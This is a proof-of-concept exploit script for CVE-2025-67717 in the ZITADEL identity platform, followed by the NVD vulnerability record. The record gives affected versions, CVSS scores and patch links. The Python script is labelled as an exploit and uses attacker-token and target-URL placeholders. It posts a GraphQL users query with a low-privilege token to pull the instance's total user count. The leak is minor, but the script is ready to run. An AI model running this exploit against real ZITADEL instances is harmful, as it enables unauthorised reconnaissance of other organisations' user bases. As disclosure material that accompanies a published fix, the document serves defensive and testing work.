CVE-2025-67717

# CVE-2025-67717 PoC - ZITADEL User Count Information Disclosure # This PoC demonstrates how an authenticated user can retrieve # the total number of users in a ZITADEL instance import requests import json TARGET_URL = "https://your-zitadel-instance.com" ATTACKER_TOKEN = "your-authenticated-user-token" def exploit_user_count_disclosure(): """ Exploit CVE-2025-67717 by querying the total user count without proper authorization checks """ headers = { "Authorization": f"Bearer {ATTACKER_TOKEN}", "Content-Type": "application/json" } # Query to get users list (with low privilege account) query = { "query": """ query { users(query: {}) { totalResult nodes { id userName } } } """ } response = requests.post( f"{TARGET_URL}/graphql", headers=headers, json=query ) if response.status_code == 200: data = response.json() total_users = data.get("data", {}).get("users", {}).get("totalResult") print(f"[+] Total users in instance: {total_users}") return total_users else: print(f"[-] Request failed: {response.status_code}") return None if __name__ == "__main__": exploit_user_count_disclosure()

{"cve": {"id": "CVE-2025-67717", "sourceIdentifier": "[email protected]", "published": "2025-12-11T01:16:01.027", "lastModified": "2026-02-02T15:10:37.503", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ZITADEL is an open-source identity infrastructure tool. Versions 2.44.0 through 3.4.4 and 4.0.0-rc.1 through 4.7.1 disclose the total number of instance users to authenticated users, regardless of their specific permissions. While this does not leak individual user data or PII, disclosing the total user count via the totalResult field constitutes an information disclosure vulnerability that may be sensitive in certain contexts. This issue is fixed in versions 3.4.5 and 4.7.2."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-497"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:zitadel:zitadel:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.44.0", "versionEndIncluding": "2.71.19", "matchCriteriaId": "1578A112-B6ED-4453-A4A8-93D034A980DB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zitadel:zitadel:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.0.0", "versionEndExcluding": "3.4.5", "matchCriteriaId": "E455D450-9A02-47A4-AC6B-3A23B477A543"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zitadel:zitadel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.0.0", "versionEndExcluding": "4.7.2", "matchCriteriaId": "FBFDBC95-1E62-4EFA-9D4A-ECCC074F112B"}]}]}], "references": [{"url": "https://github.com/zitadel/zitadel/commit/826039c6208fe71df57b3a94c982b5ac5b0af12c", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/zitadel/zitadel/security/advisories/GHSA-f4cf-9rvr-2rcx", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}